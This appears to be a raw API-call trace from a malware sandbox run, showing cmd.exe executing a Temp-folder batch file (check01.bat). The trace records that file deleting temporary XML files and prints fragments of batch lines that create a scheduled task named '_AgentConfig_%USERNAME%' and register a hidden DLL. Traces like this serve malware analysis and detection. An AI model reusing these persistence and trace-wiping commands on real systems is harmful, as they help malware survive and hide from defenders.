[0380.831] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0380.831] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0380.831] GetProcessHeap () returned 0x200000
[0380.831] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.831] GetProcessHeap () returned 0x200000
[0380.831] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2413f0 | out: hHeap=0x200000) returned 1
[0380.832] GetProcessHeap () returned 0x200000
[0380.832] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3d0 | out: hHeap=0x200000) returned 1
[0380.832] _tell (_FileHandle=3) returned 2851
[0380.832] _close (_FileHandle=3) returned 0
[0380.832] _wcsicmp (_String1="Del", _String2="DIR") returned -4
[0380.833] _wcsicmp (_String1="Del", _String2="ERASE") returned -1
[0380.833] _wcsicmp (_String1="Del", _String2="DEL") returned 0
[0380.833] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0380.833] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201d70, Size=0x70) returned 0x201d70
[0380.833] GetProcessHeap () returned 0x200000
[0380.833] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201d70) returned 0x70
[0380.833] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x70) returned 0x220470
[0380.833] GetProcessHeap () returned 0x200000
[0380.833] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x70
[0380.834] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1eee60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.834] GetProcessHeap () returned 0x200000
[0380.834] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f4a0
[0380.834] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1edd70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.834] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee880, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1
[0380.834] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8
[0380.834] GetProcessHeap () returned 0x200000
[0380.834] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f500
[0380.834] GetProcessHeap () returned 0x200000
[0380.835] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x21d7a0
[0380.835] _wcsicmp (_String1="TTT.TMP", _String2=".") returned 70
[0380.835] _wcsicmp (_String1="TTT.TMP", _String2="..") returned 70
[0380.835] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\ttt.tmp")) returned 0x2020
[0380.835] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201750 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.835] SetErrorMode (uMode=0x0) returned 0x0
[0380.835] SetErrorMode (uMode=0x1) returned 0x0
[0380.836] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.TMP", nBufferLength=0x104, lpBuffer=0x1edd90, lpFilePart=0x1edd80 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.TMP", lpFilePart=0x1edd80*="TTT.TMP") returned 0x2c
[0380.836] SetErrorMode (uMode=0x0) returned 0x1
[0380.836] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010
[0380.836] GetProcessHeap () returned 0x200000
[0380.836] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x218f10
[0380.836] _wcsicmp (_String1="TTT.TMP", _String2=".") returned 70
[0380.836] _wcsicmp (_String1="TTT.TMP", _String2="..") returned 70
[0380.836] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\ttt.tmp")) returned 0x2020
[0380.837] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\ttt.tmp"), fInfoLevelId=0x0, lpFindFileData=0x21dd54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21dd54) returned 0x21f560
[0380.837] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\ttt.tmp")) returned 1
[0380.838] FindNextFileW (in: hFindFile=0x21f560, lpFindFileData=0x21dd54 | out: lpFindFileData=0x21dd54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99027b00, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0x99027b00, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x99073dc0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x353fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTT.tmp", cAlternateFileName="")) returned 0
[0380.838] GetLastError () returned 0x12
[0380.838] FindClose (in: hFindFile=0x21f560 | out: hFindFile=0x21f560) returned 1
[0380.838] GetProcessHeap () returned 0x200000
[0380.838] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0380.838] GetProcessHeap () returned 0x200000
[0380.838] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2204f0 | out: hHeap=0x200000) returned 1
[0380.838] GetProcessHeap () returned 0x200000
[0380.839] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.839] GetProcessHeap () returned 0x200000
[0380.839] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201df0 | out: hHeap=0x200000) returned 1
[0380.839] GetProcessHeap () returned 0x200000
[0380.839] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0380.839] GetProcessHeap () returned 0x200000
[0380.839] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0380.839] GetProcessHeap () returned 0x200000
[0380.840] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d7a0 | out: hHeap=0x200000) returned 1
[0380.840] GetProcessHeap () returned 0x200000
[0380.840] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0380.840] GetProcessHeap () returned 0x200000
[0380.840] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0380.840] GetProcessHeap () returned 0x200000
[0380.840] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233500 | out: hHeap=0x200000) returned 1
[0380.840] GetProcessHeap () returned 0x200000
[0380.841] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0380.841] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.841] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0380.841] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0380.842] _get_osfhandle (_FileHandle=0) returned 0x3
[0380.842] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0380.843] SetConsoleInputExeNameW () returned 0x1
[0380.843] GetConsoleOutputCP () returned 0x1b5
[0380.843] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0380.843] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0380.844] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0380.844] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0380.844] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.844] SetFilePointer (in: hFile=0x64, lDistanceToMove=2851, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0380.844] GetProcessHeap () returned 0x200000
[0380.844] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233480 | out: hHeap=0x200000) returned 1
[0380.844] GetProcessHeap () returned 0x200000
[0380.845] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0380.845] GetProcessHeap () returned 0x200000
[0380.845] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233400 | out: hHeap=0x200000) returned 1
[0380.845] GetProcessHeap () returned 0x200000
[0380.845] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0380.845] GetProcessHeap () returned 0x200000
[0380.845] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0380.845] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.845] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0380.846] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x40f, lpOverlapped=0x0) returned 1
[0380.846] SetFilePointer (in: hFile=0x64, lDistanceToMove=2871, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0380.846] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\a.xml\"\r\n", cbMultiByte=20, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="Del \"%temp%\\a.xml\"\r\n\r\nZ11 /f\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 20
[0380.846] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.846] GetFileType (hFile=0x64) returned 0x1
[0380.846] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.846] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0380.846] GetProcessHeap () returned 0x200000
[0380.846] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x23d3d0
[0380.847] GetProcessHeap () returned 0x200000
[0380.847] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2413f0
[0380.847] GetProcessHeap () returned 0x200000
[0380.847] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0380.847] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0380.847] GetProcessHeap () returned 0x200000
[0380.847] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.847] GetProcessHeap () returned 0x200000
[0380.847] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2413f0 | out: hHeap=0x200000) returned 1
[0380.847] GetProcessHeap () returned 0x200000
[0380.848] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3d0 | out: hHeap=0x200000) returned 1
[0380.848] _tell (_FileHandle=3) returned 2871
[0380.848] _close (_FileHandle=3) returned 0
[0380.848] _wcsicmp (_String1="Del", _String2="DIR") returned -4
[0380.849] _wcsicmp (_String1="Del", _String2="ERASE") returned -1
[0380.849] _wcsicmp (_String1="Del", _String2="DEL") returned 0
[0380.849] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0380.849] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201d70, Size=0x6c) returned 0x201d70
[0380.849] GetProcessHeap () returned 0x200000
[0380.849] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201d70) returned 0x6c
[0380.849] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x23d400, Size=0x6c) returned 0x233500
[0380.849] GetProcessHeap () returned 0x200000
[0380.850] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x233500) returned 0x6c
[0380.850] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1eee60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.850] GetProcessHeap () returned 0x200000
[0380.850] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f4a0
[0380.850] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1edd70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.850] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee880, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1
[0380.850] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8
[0380.850] GetProcessHeap () returned 0x200000
[0380.851] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f500
[0380.851] GetProcessHeap () returned 0x200000
[0380.851] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x21d7a0
[0380.851] _wcsicmp (_String1="a.xml", _String2=".") returned 51
[0380.851] _wcsicmp (_String1="a.xml", _String2="..") returned 51
[0380.851] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml")) returned 0x2020
[0380.851] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201750 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.851] SetErrorMode (uMode=0x0) returned 0x0
[0380.852] SetErrorMode (uMode=0x1) returned 0x0
[0380.852] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", nBufferLength=0x104, lpBuffer=0x1edd90, lpFilePart=0x1edd80 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", lpFilePart=0x1edd80*="a.xml") returned 0x2a
[0380.852] SetErrorMode (uMode=0x0) returned 0x1
[0380.852] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010
[0380.852] GetProcessHeap () returned 0x200000
[0380.852] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x218f10
[0380.852] _wcsicmp (_String1="a.xml", _String2=".") returned 51
[0380.852] _wcsicmp (_String1="a.xml", _String2="..") returned 51
[0380.852] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml")) returned 0x2020
[0380.853] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), fInfoLevelId=0x0, lpFindFileData=0x21dd54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21dd54) returned 0x21f560
[0380.853] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml")) returned 1
[0380.857] FindNextFileW (in: hFindFile=0x21f560, lpFindFileData=0x21dd54 | out: lpFindFileData=0x21dd54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf9306dc0, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf9306dc0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf9d70e00, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x524, dwReserved0=0x0, dwReserved1=0x0, cFileName="a.xml", cAlternateFileName="")) returned 0
[0380.857] GetLastError () returned 0x12
[0380.857] FindClose (in: hFindFile=0x21f560 | out: hFindFile=0x21f560) returned 1
[0380.857] GetProcessHeap () returned 0x200000
[0380.857] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0380.857] GetProcessHeap () returned 0x200000
[0380.858] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2204e0 | out: hHeap=0x200000) returned 1
[0380.858] GetProcessHeap () returned 0x200000
[0380.858] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.858] GetProcessHeap () returned 0x200000
[0380.858] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0380.858] GetProcessHeap () returned 0x200000
[0380.858] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0380.858] GetProcessHeap () returned 0x200000
[0380.858] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0380.859] GetProcessHeap () returned 0x200000
[0380.859] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d7a0 | out: hHeap=0x200000) returned 1
[0380.859] GetProcessHeap () returned 0x200000
[0380.859] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0380.859] GetProcessHeap () returned 0x200000
[0380.860] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0380.860] GetProcessHeap () returned 0x200000
[0380.860] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201df0 | out: hHeap=0x200000) returned 1
[0380.860] GetProcessHeap () returned 0x200000
[0380.860] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233500 | out: hHeap=0x200000) returned 1
[0380.860] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.860] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0380.861] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0380.862] _get_osfhandle (_FileHandle=0) returned 0x3
[0380.862] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0380.862] SetConsoleInputExeNameW () returned 0x1
[0380.862] GetConsoleOutputCP () returned 0x1b5
[0380.863] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0380.863] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0380.863] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0380.864] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0380.864] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.864] SetFilePointer (in: hFile=0x64, lDistanceToMove=2871, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0380.864] GetProcessHeap () returned 0x200000
[0380.864] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233480 | out: hHeap=0x200000) returned 1
[0380.864] GetProcessHeap () returned 0x200000
[0380.865] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0380.865] GetProcessHeap () returned 0x200000
[0380.865] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233400 | out: hHeap=0x200000) returned 1
[0380.865] GetProcessHeap () returned 0x200000
[0380.865] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0380.865] GetProcessHeap () returned 0x200000
[0380.865] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0380.866] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.866] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0380.866] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x3fb, lpOverlapped=0x0) returned 1
[0380.866] SetFilePointer (in: hFile=0x64, lDistanceToMove=2893, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0380.866] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\Z11.xml\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="Del \"%temp%\\Z11.xml\"\r\nZ11 /f\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 22
[0380.866] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.866] GetFileType (hFile=0x64) returned 0x1
[0380.866] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.866] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0380.867] GetProcessHeap () returned 0x200000
[0380.867] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x23f3d0
[0380.867] GetProcessHeap () returned 0x200000
[0380.867] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2433f0
[0380.867] GetProcessHeap () returned 0x200000
[0380.867] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0380.867] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0380.867] GetProcessHeap () returned 0x200000
[0380.867] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.867] GetProcessHeap () returned 0x200000
[0380.868] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2433f0 | out: hHeap=0x200000) returned 1
[0380.868] GetProcessHeap () returned 0x200000
[0380.868] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23f3d0 | out: hHeap=0x200000) returned 1
[0380.868] _tell (_FileHandle=3) returned 2893
[0380.868] _close (_FileHandle=3) returned 0
[0380.869] _wcsicmp (_String1="Del", _String2="DIR") returned -4
[0380.869] _wcsicmp (_String1="Del", _String2="ERASE") returned -1
[0380.869] _wcsicmp (_String1="Del", _String2="DEL") returned 0
[0380.869] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0380.869] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201d70, Size=0x70) returned 0x201d70
[0380.869] GetProcessHeap () returned 0x200000
[0380.869] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201d70) returned 0x70
[0380.870] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x70) returned 0x220470
[0380.870] GetProcessHeap () returned 0x200000
[0380.870] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x70
[0380.870] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1eee60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.870] GetProcessHeap () returned 0x200000
[0380.870] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f4a0
[0380.870] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1edd70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.870] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee880, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1
[0380.870] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8
[0380.871] GetProcessHeap () returned 0x200000
[0380.871] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f500
[0380.871] GetProcessHeap () returned 0x200000
[0380.871] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x21d7a0
[0380.871] _wcsicmp (_String1="Z11.xml", _String2=".") returned 76
[0380.871] _wcsicmp (_String1="Z11.xml", _String2="..") returned 76
[0380.871] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\z11.xml")) returned 0x2020
[0380.872] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201750 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.872] SetErrorMode (uMode=0x0) returned 0x0
[0380.872] SetErrorMode (uMode=0x1) returned 0x0
[0380.872] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", nBufferLength=0x104, lpBuffer=0x1edd90, lpFilePart=0x1edd80 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", lpFilePart=0x1edd80*="Z11.xml") returned 0x2c
[0380.872] SetErrorMode (uMode=0x0) returned 0x1
[0380.872] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010
[0380.872] GetProcessHeap () returned 0x200000
[0380.872] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x218f10
[0380.873] _wcsicmp (_String1="Z11.xml", _String2=".") returned 76
[0380.873] _wcsicmp (_String1="Z11.xml", _String2="..") returned 76
